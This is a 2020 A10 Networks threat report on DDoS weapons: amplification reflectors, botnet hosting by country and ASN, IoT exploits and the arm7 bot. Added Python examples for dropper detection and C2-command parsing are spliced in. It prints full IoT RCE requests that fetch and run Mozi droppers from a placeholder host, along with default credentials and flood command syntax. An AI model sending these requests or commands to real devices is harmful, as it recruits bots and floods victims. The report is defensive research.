The State of DDoS Weapons A Threat Intelligence Report By A10 Networks Security Research Q2 2020

THE STATE OF DDOS WEAPONS REPORT A10 Networks | 1



DDoS attacks continue to grow in frequency, intensity, and sophistication. However, the delivery method of using infected botnets and vulnerable servers to perform crushing attacks on a massive scale has not changed. Unlike other cyber attacks, where attackers leverage obfuscation to prevent detection, the loud distributed nature of DDoS attacks creates opportunities for defenders to take a proactive approach by focusing on the weapon’s location.

Reflected Amplification Weapons

Attackers exploit the connectionless, unauthenticated nature of UDP: they send small requests whose source address is spoofed to the target’s IP address to internet-exposed servers, and those servers send their responses to the target instead of the attacker. Because the responses are much larger than the requests, the attack is amplified on the way to the victim.

DDoS Botnet Weapons

Attackers leverage malware-infected computers, servers, and IoT devices that are under the control of a bot herder. The resulting botnet is used to initiate stateful and stateless volumetric, network, and application-layer attacks.


Executive Summary

DDoS Weapons Tracked By A10 Networks: approximately 10 million unique source addresses

Key Insights from this Report

• Portmap is the largest reflected amplification protocol seen this quarter.

• Even though SSDP and TFTP are close behind in size, they are far more dangerous in terms of their amplification factor and mitigation difficulty/complexity.

• With the addition of portmap to the report, the U.S. has taken the lead in the number of potential amplification weapons hosted, while China continues to top the list of active bots or drones.

• Exploits that surfaced in late 2019 are now being weaponized, as seen in the Malware Propagation and Drone Recruitment section of this report.


Identify and Enumerate the Origin of DDoS Weapons

Threat researchers gather weapons intelligence by closely monitoring attack agents under the control of botnet command and control (C2), discovering malware innovations through deploying honeypots, and scanning the internet for exposed reflected amplification sources.

A10 Networks accumulates millions of IP addresses of exploited hosts regularly used in DDoS attacks. This data is used to create voluminous feeds that include millions of entries. A10 solutions have the capacity to consume these entries and facilitate the implementation of surgical security and mitigation policies.

DDoS Weapons Intelligence

“It’s impossible to fully understand the motivation or timing of all DDoS attacks. However, having an inventory of the weapons and compromised networks is possible. A10 Networks’ DDoS weapons intelligence provides defenders key data to improve their DDoS situational awareness, allowing them to proactively defend themselves even before the attack starts.”

—Rich Groves, Director of Security Research, A10 Networks

Top Tracked DDoS Weapons by Size

Portmap: 1,818,848
SNMP: 1,673,070
SSDP: 1,671,128
DNS Resolver: 1,331,160
TFTP: 1,054,330


Top Sources of DDoS Weaponry

Although the nature of DDoS attacks is distributed, we have found valuable insights from where they originate. DDoS weapons are globally distributed, with higher concentrations found where internet-connected populations are most dense.

Top Countries Hosting DDoS Weapons

United States 1,591,719
China 1,388,531
Korea 776,327
Russia 696,186
India 283,960

An autonomous system (identified by its ASN) is a collection of IP address ranges that are under the control of a single administrative operator. These companies or government operators allow large numbers of weapons belonging to their users to remain connected to their network and attack other systems.

Top ASNs Hosting DDoS Weapons

China Telecom 567,911
Charter Communications 477,926
Korea Telecom 366,714
China Unicom CN 356,649
Chunghwa Telecom 167,732


DDoS Botnet Agents

Compute nodes like computers, servers, routers, cameras, and other IoT devices that are infected by malware and under the control of a malicious actor are the prized tools for motivated DDoS attackers. These weapons, commonly referred to as bots or botnets, provide the ultimate flexibility to DDoS attackers.

Security researchers accumulate knowledge of hosts repeatedly used in DDoS attacks and scan for hosts exhibiting malware-infected characteristics. These IP addresses deserve further scrutiny and should be treated as suspicious while under a DDoS attack.

Top Countries Hosting DDoS Botnet Agents

1. China 15%
2. Vietnam 12%
3. Taiwan 9%
4. Greece 4%
5. Other 60%

Top ASNs Hosting DDoS Botnet Agents

Chunghwa Telecom (Taiwan)
China Telecom
China Unicom CN
VNPT Corp (Vietnam)
Telecom Egypt


Malware Propagation and Drone Recruitment

IoT devices tend to be systems that the user installs and then forgets about. In many cases, this means that when security updates and bug fixes are required, the user either does not know or does not care.

With this in mind, the most common way in which bad actors target these devices is through a collection of remote code execution (RCE) exploits and an ever-growing list of default user names and passwords from device vendors, in an effort to constantly increase the size and strength of their DDoS attacks. For this approach to scale, modern malware is built so that newly infected bots scan for and infect other vulnerable systems on their own, without further involvement from the operator.

A10 Networks’ weapons intelligence system detects hundreds of thousands of such events per hour from all over the internet.

Top IoT Exploits

The following table lists the top IoT exploits detected and recorded by A10 Networks, the TCP ports used by these exploits, and the sample content within the requests sent by these exploits for RCE or brute-force login attacks.

Exploit: Default credentials for a growing list of IoT devices with weak or documented administrator passwords
Port: 23 (Telnet)
Sample content: Username and password combinations starting with the original 61 from the Mirai source code and new additions depending on the malware family (admin/admin, root/vizxv, etc.)

Exploit: NETGEAR unauthenticated RCE
Port: 80 (HTTP)
Sample content: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://x.x.x.x/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Exploit: RCE for many DVR systems
Port: 81
Sample content: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://x.x.x.x/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0

Exploit: RCE for VACRON network video recorders
Port: 8080
Sample content: GET /board.cgi?cmd=cd+/tmp;rm+rf+*;wget+http://x.x.x.x/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Exploit: JAWS web server unauthenticated RCE
Port: 60001
Sample content: GET /shell?cd /tmp;wget http://x.x.x.x/jaws.sh -O jaws.sh;sh jaws.sh HTTP/1.1 Connection: keep-alive
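The request strings in the table are exactly what a web-facing IoT device, or a honeypot posing as one, logs when a Mozi- or Mirai-style scanner hits it. The following added example, not A10 Networks' code, shows how the traits those requests share (a known-vulnerable path, a parameter that reaches a shell, ${IFS} in place of spaces, and a fetch-and-run wget/sh sequence) can be turned into an access-log check. The log lines and the trait names are constructed for the example; the client addresses are RFC 5737 documentation ranges.

```python
"""Flag HTTP requests carrying the IoT RCE / dropper patterns from the table.

Added detection example, not A10 Networks' code.  The log lines below are
constructed for this example (Common Log Format, RFC 5737 test addresses) and
model the table's sample requests; the trait names are this example's own.
"""
import re
from urllib.parse import unquote_plus

# Apache/nginx-style access log: client, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>HTTP/\d\.\d)" (?P<status>\d{3})'
)

# Paths hit by the table's exploits: NETGEAR setup.cgi, VACRON board.cgi,
# JAWS /shell and the DVR /language/ handler.
VULN_PATHS = re.compile(r"^/(?:setup\.cgi$|board\.cgi$|shell$|language/)")
# Parameters that hand their value straight to a shell.
COMMAND_PARAMS = re.compile(r"(?:todo=syscmd|[?&]cmd=)")
# ${IFS} stands in for a space where the exploit cannot send one.
IFS_OBFUSCATION = re.compile(r"\$\{IFS\}")
# Fetch-and-run: a downloader pointed at a URL in the same command segment,
# or sh/chmod applied to whatever was fetched.
SHELL_DOWNLOAD = re.compile(
    r"(?:wget|curl|tftp)\b[^;&|]*https?://|(?:^|[;&|\s])(?:sh|chmod)\s"
)

# Constructed sample log: two benign requests and the four exploit rows.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2020:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512
203.0.113.9 - - [12/Jun/2020:10:01:07 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://x.x.x.x/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 0
198.51.100.7 - - [12/Jun/2020:10:02:13 +0000] "GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://x.x.x.x/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0" 404 0
198.51.100.8 - - [12/Jun/2020:10:02:40 +0000] "GET /board.cgi?cmd=cd+/tmp;rm+rf+*;wget+http://x.x.x.x/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 0
192.0.2.4 - - [12/Jun/2020:10:03:01 +0000] "GET /shell?cd%20/tmp;wget%20http://x.x.x.x/jaws.sh%20-O%20jaws.sh;sh%20jaws.sh HTTP/1.1" 404 0
10.0.0.6 - - [12/Jun/2020:10:03:30 +0000] "GET /search?q=how+to+wget+a+file HTTP/1.1" 200 2048
"""


def classify(uri: str) -> list[str]:
    """Return the traits a request URI exhibits; an empty list means clean."""
    decoded = unquote_plus(uri)                      # undo %XX and '+'
    normalized = decoded.replace("${IFS}", " ")      # undo ${IFS} spacing
    path = normalized.split("?", 1)[0]
    traits = []
    if VULN_PATHS.search(path):
        traits.append("known-vulnerable-path")
    if COMMAND_PARAMS.search(normalized):
        traits.append("command-parameter")
    if IFS_OBFUSCATION.search(decoded):
        traits.append("ifs-obfuscation")
    if SHELL_DOWNLOAD.search(normalized):
        traits.append("shell-download")
    return traits


def is_dropper(traits: list[str]) -> bool:
    """Fetch-and-run plus at least one more trait: a search query that merely
    mentions wget stays quiet, a JAWS /shell?...wget... request does not."""
    return "shell-download" in traits and len(traits) >= 2


def scan(log_text: str) -> list[dict]:
    """Run the classifier over access-log text and return the dropper hits."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        traits = classify(m["uri"])
        if is_dropper(traits):
            hits.append({"src": m["src"], "uri": m["uri"], "traits": traits})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['src']:15s} {','.join(hit['traits']):55s} {hit['uri'][:50]}")
```

Decoding %XX, '+' and ${IFS} before matching is the important step: applied to the raw request line, a plain `wget ` pattern misses every row in the table. Requiring two traits rather than one keeps the check usable on a busy web server while still catching the bare JAWS request, whose path is itself an indicator.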


Top IoT Binaries Dropped by Attack

Throughout the quarter, A10 Networks’ weapons intelligence system detected thousands of malware binaries dropped onto systems in the wake of the different IoT-based attacks and exploits discussed above. The following table lists the top binaries detected and the malware family they belong to (based on the payload and behavior of the binaries).

Binary Name    Malware Family
arm7           Gafgyt family
Cloud.x86      Dark Nexus
mmmmh.x86      Mirai family
Mozi.m         Gafgyt family
Mozi.a         Gafgyt family

Capabilities of the Most Distributed Binary

At A10 Networks, we decided to dig deeper into the characteristics and behavior of the binary we saw the most this quarter, namely “arm7.” By reverse engineering and analyzing the “arm7” binary, a firm understanding of this DDoS weapon is established, which can help in creating a more efficient and effective mitigation strategy.

ARM7 Attack Toolkit Sample

Attack type: TCP floods (flags: SYN, RST, FIN, ACK, PSH, URG)
Description: arm7 is able to source a flood of TCP traffic with random payloads, using any of the flags shown. Below is a sample of the attack command and options used at attack time:
    SYN <host> <port> <time> 32 <packetsize>

Attack type: HTTP floods (methods: Get, Head, Post, Put, Delete, Trace, Option)
Description: These HTTP attacks are built into the binary and are dangerous not just for bandwidth exhaustion but also for connection exhaustion. Each HTTP method uses the same attack syntax as this sample:
    HTTP GET <host or domain> <port> <path> <time> <conns>

Attack type: UDP floods
Description: A standard UDP flood with random data padding.
    UDP <host> <port> <time> 32 <packetsize>

Attack type: Valve
Description: A Valve Source Engine (VSE) query, which in theory is generally used for amplification. However, it has increasingly been seen as a directed attack on an endpoint as well.
    VSE <host> <port> <time> 32 <packetsize>

Attack type: DNS flood
Description: A flood of UDP DNS queries.
    DNS <host> <port> <time>

Attack type: ICMP
Description: A flood of ICMP “destination unreachable” messages (BlackNurse).
    BLACKNURSE <host> <time>

Attack type: Hex
Description: A flood of the hex string of your choice.
    HEX <host> <port> <time> <packetsize>
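The command syntax in the table is, in effect, arm7's C2 grammar. The following is an added example, not A10 Networks' code and not the bot's own parser: it turns captured command lines into normalized records (vector, target, port, duration, sizes) that a mitigation pipeline or sandbox log can consume, and rejects malformed ones. The field names, the numeric bounds and the sample commands are this example's assumptions; the fixed "32" is carried through as an opaque field because the report does not explain it.

```python
"""Parse arm7 C2 attack commands into normalized attack records.

Added example based on the command syntax in the table above; it is not A10
Networks' code and not the bot's own parser.  Field names, bounds, the sample
commands and the error messages are this example's own.  The literal "32" in
the TCP, UDP and VSE syntax is preserved unchanged because the report does not
say what it means.
"""
from dataclasses import dataclass
from typing import Optional

TCP_FLAGS = {"SYN", "RST", "FIN", "ACK", "PSH", "URG"}
HTTP_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "TRACE", "OPTION"}


@dataclass
class AttackOrder:
    vector: str                    # e.g. "tcp/SYN", "http/GET", "udp", "icmp/blacknurse"
    target: str                    # host, IP or domain exactly as the herder sent it
    duration: int                  # the <time> field
    port: Optional[int] = None     # absent for BLACKNURSE (ICMP has no port)
    packet_size: Optional[int] = None
    path: Optional[str] = None     # HTTP floods only
    conns: Optional[int] = None    # HTTP floods only
    literal: Optional[int] = None  # the fixed "32" field where the syntax has one


def _int(token: str, name: str, lo: int, hi: int) -> int:
    try:
        value = int(token)
    except ValueError:
        raise ValueError(f"{name}: not an integer: {token!r}") from None
    if not lo <= value <= hi:
        raise ValueError(f"{name}: {value} outside {lo}..{hi}")
    return value


def _port(token: str) -> int:
    return _int(token, "port", 1, 65535)


def _time(token: str) -> int:
    return _int(token, "time", 1, 86400)        # upper bound is an assumption


def _size(token: str) -> int:
    return _int(token, "packetsize", 1, 65535)


def parse_command(line: str) -> AttackOrder:
    """Parse one C2 line; raise ValueError for anything outside the grammar."""
    tokens = line.split()
    if not tokens:
        raise ValueError("empty command")
    cmd, args = tokens[0].upper(), tokens[1:]

    def expect(n: int) -> None:
        if len(args) != n:
            raise ValueError(f"{cmd}: expected {n} arguments, got {len(args)}")

    if cmd in TCP_FLAGS or cmd in ("UDP", "VSE"):
        expect(5)                                   # <host> <port> <time> 32 <packetsize>
        vector = f"tcp/{cmd}" if cmd in TCP_FLAGS else cmd.lower()
        return AttackOrder(vector, args[0], _time(args[2]), port=_port(args[1]),
                           packet_size=_size(args[4]),
                           literal=_int(args[3], "literal", 0, 2**31 - 1))
    if cmd == "HTTP":
        expect(6)                                   # <method> <host> <port> <path> <time> <conns>
        method = args[0].upper()
        if method not in HTTP_METHODS:
            raise ValueError(f"HTTP: unknown method {args[0]!r}")
        return AttackOrder(f"http/{method}", args[1], _time(args[4]), port=_port(args[2]),
                           path=args[3], conns=_int(args[5], "conns", 1, 1_000_000))
    if cmd == "DNS":
        expect(3)                                   # <host> <port> <time>
        return AttackOrder("dns", args[0], _time(args[2]), port=_port(args[1]))
    if cmd == "BLACKNURSE":
        expect(2)                                   # <host> <time>
        return AttackOrder("icmp/blacknurse", args[0], _time(args[1]))
    if cmd == "HEX":
        expect(4)                                   # <host> <port> <time> <packetsize>
        return AttackOrder("hex", args[0], _time(args[2]), port=_port(args[1]),
                           packet_size=_size(args[3]))
    raise ValueError(f"unknown command {cmd!r}")


# Constructed sample of what a captured C2 channel might carry.
SAMPLE_C2 = [
    "SYN 192.0.2.10 80 120 32 1024",
    "HTTP GET www.example.com 443 /login 60 500",
    "BLACKNURSE 192.0.2.10 30",
    "SYN 192.0.2.10 99999 10 32 64",     # port out of range: rejected
]

if __name__ == "__main__":
    for line in SAMPLE_C2:
        try:
            print(parse_command(line))
        except ValueError as exc:
            print(f"rejected {line!r}: {exc}")
```

The point of normalizing is that the same record drives different responses: a `tcp/SYN` order with a known target and port is enough to pre-stage a SYN-cookie or rate-limit policy on that port, while an `http/GET` order with a high `conns` value signals connection exhaustion rather than bandwidth, which a volumetric scrubber alone will not catch.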

Top Countries/Regions Hosting Reflected Amplification Attack Weapons

Amplification – A Favorite for Large DDoS Attacks

Amplified reflection attacks take the prize when it comes to size. This attack strategy exploits the connectionless nature of UDP and spoofs the victim’s IP address.

The attacker sends volumes of small requests, with the source address spoofed to the victim’s IP address, to internet-exposed servers. The servers reply with large amplified responses to the unwitting victim. These particular servers are targeted because they answer unauthenticated requests and are running applications or protocols with amplification capabilities.

The most common types of these attacks can use millions of exposed DNS, NTP, SSDP, SNMP, and CLDAP UDP-based services. These attacks have resulted in record-breaking volumetric attacks, such as the recent CLDAP-based AWS attack in Q1 2020, which peaked at 2.3 Tbps and was 70% higher than the previous record holder, the 1.35 Tbps Memcached-based GitHub attack of 2018.

Although CLDAP does not make the top 5 list of our amplification attack weapons this quarter, we did record 15,651 potential CLDAP weapons. That is a fraction of the top amplification attack weapon this quarter, portmap: for every CLDAP weapon there are 116 portmap weapons available to attackers. The AWS attack shows that even this fractional attack surface has the potential for generating very large-scale DDoS attacks, and it underscores the need to proactively keep track of DDoS weapons and potential exploits: a reflector that is known in advance can be rate-limited or blocked before its traffic arrives.

PORTMAP

Country/Region Unique Sources
United States 773,544
China 190,642
Russia 78,889
France 73,135
Germany 63,358

SSDP

Country/Region Unique Sources
Republic of Korea 386,810
China 238,194
Taiwan 120,240
Japan 69,474
United States 65,336

TFTP

Country/Region Unique Sources
Republic of Korea 243,554
United States 143,873
Russia 106,820
China 64,804
Canada 42,477

SNMP

Country/Region Unique Sources
United States 275,352
Republic of Korea 198,899
India 156,880
Brazil 107,559
Italy 85,606

DNS Resolvers

Country/Region Unique Sources
United States 515,713
Republic of Korea 216,982
India 77,663
Brazil 43,972
Italy 32,233


DDoS Weapons and Threat Intelligence

Sophisticated DDoS threat intelligence, combined with real-time threat detection and automated signature extraction, will allow the marketplace to defend against even the most massive multi-vector DDoS attacks, no matter where they originate.

Actionable DDoS weapons intelligence enables a proactive approach to DDoS defenses by creating blacklists based on current and accurate feeds of IP addresses of DDoS botnets and available vulnerable servers commonly used for DDoS attacks.

A10 Networks’ security researchers are at the forefront of DDoS weapons intelligence. A10 delivers a comprehensive and converged system to enable organizations to achieve full-spectrum DDoS protection.

To learn more about A10 Networks DDoS weapons intelligence, visit our DDoS threat map at: https://threats.a10networks.com


About A10 Networks

A10 Networks (NYSE: ATEN) provides secure application services for on-premises, multi-cloud and edge-cloud environments at hyperscale. Our mission is to enable service providers and enterprises to deliver business-critical applications that are secure, available and efficient for multi-cloud transformation and 5G readiness. We deliver better business outcomes that support investment protection, new business models and help future-proof infrastructures, empowering our customers to provide the most secure and available digital experience. Founded in 2004, A10 Networks is based in San Jose, Calif. and serves customers globally. For more information, visit www.a10networks.com and follow us @A10Networks.

Learn more about A10 Networks: www.a10networks.com

Contact us: a10networks.com/contact

©2020 A10 Networks, Inc. All rights reserved. A10 Networks, the A10 Networks logo, ACOS, Thunder, Lightning, Harmony and SSL Insight are trademarks or registered trademarks of A10 Networks, Inc. in the United States and other countries. All other trademarks are property of their respective owners. A10 Networks assumes no responsibility for any inaccuracies in this document. A10 Networks reserves the right to change, modify, transfer, or otherwise revise this publication without notice. For the full list of trademarks, visit: www.a10networks.com/a10-trademarks.

Part Number: A10-EB-14115-EN-05 JUN 2020